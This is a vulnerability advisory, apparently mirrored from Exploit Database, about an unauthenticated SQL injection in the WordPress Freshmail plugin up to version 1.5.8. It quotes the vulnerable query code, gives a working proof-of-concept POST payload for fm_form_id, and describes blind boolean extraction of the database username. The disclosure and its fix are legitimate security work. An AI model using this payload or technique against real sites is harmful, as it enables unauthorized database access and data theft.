WordPress Plugin Freshmail 1.5.8 – SQL Injection

• Exploit Database
• 125 阅读

• 作者： Felipe Molina
  日期： 2015-05-07
• 类别：

  • webapps
  平台：

  • multiple
• 来源：https://www.exploit-db.com/exploits/36930/
• 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89

  # Exploit Title: Unauthenticated SQL Injection on WordPress Freshmail (#1) # Google Dork: N/A # Date: 05/05/2015 # Exploit Author: Felipe Molina de la Torre (@felmoltor) # Vendor Homepage: *http://freshmail.com/ <http://freshmail.com/> # Version: <= 1.5.8, Communicated and Fixed by the Vendor in 1.6 # Tested on: Linux 2.6, PHP 5.3 with magic_quotes_gpc turned off, Apache 2.4.0 (Ubuntu) # CVE : N/A # Category: webapps   1. Summary ------------------   Freshmail plugin is an email marketing plugin for wordpress, allowing the administrator to create mail campaigns and keep track of them.   There is a unauthenticated SQL injection vulnerability in the "Subscribe to our newsletter" formularies showed to the web visitors in the POST parameter *fm_form_id. *   2. Vulnerability timeline ----------------------------------   - 04/05/2015: Identified in version 1.5.8 and contact the developer company by twitter. - 05/05/2015: Send the details by mail to developer.   - 05/05/2015: Response from the developer. - 06/05/2015: Fixed version in 1.6   3. Vulnerable code ---------------------------   Vulnerable File: include/wp_ajax_fm_form.php, lines 44 and 50   [...] Line 28:add_action(&apos;wp_ajax_fm_form&apos;, &apos;fm_form_ajax_func&apos;); Line 29:add_action(&apos;wp_ajax_nopriv_fm_form&apos;, &apos;fm_form_ajax_func&apos;); [...] Line 44: $result = $_POST; [...] Line 50: $form = $wpdb->get_row(&apos;select * from &apos;.$wpdb->prefix.&apos;fm_forms where form_id="&apos;.*$result[&apos;fm_form_id&apos;]*.&apos;";&apos;); [...]   3. Proof of concept ---------------------------   POST /wp-admin/admin-ajax.php HTTP/1.1 Host: <web> X-Requested-With: XMLHttpRequest [...] Cookie: wordpress_f30[...]   form%5Bemail%5D=fake@fake.com&form%5Bimie%5D=asdf&fm_form_id=1" and "a"="a&action=fm_form&fm_form_referer=%2F   4. Explanation ---------------------   A page visitor can submit an email (fake@fake.com) to subscribe to the formulary with fm_form_id="1" and the JSON message received will be simil= ar to:   {"form":{"email":"fake@fake.com","imie":"asdf"},"fm_form_id":"*1* ","action":"fm_form","fm_form_referer":"\/?p=86","redirect":0,"status":"s= uccess","message":"*Your sign up request was successful! Please check your email inbox.*"}   The second time he tries to do the same with the same email the message returned will be:   {"form":{"email":"fake@fake.com","imie":"asdf"},"fm_form_id":"*1* ","action":"fm_form","fm_form_referer":"\/?p=86","redirect":0,"status":"s= uccess","message":"*Given email address is already subscribed, thank you!*"}   If we insert *1**" and substr(user(),1,1)="a *we&apos;ll receive either the sa= me messageindicating that the Given email is already subscribed indicating that the first character of the username is an "a" or a null message indicating that the username first character is not an "a".   5. Solution ---------------   Update to version 1.6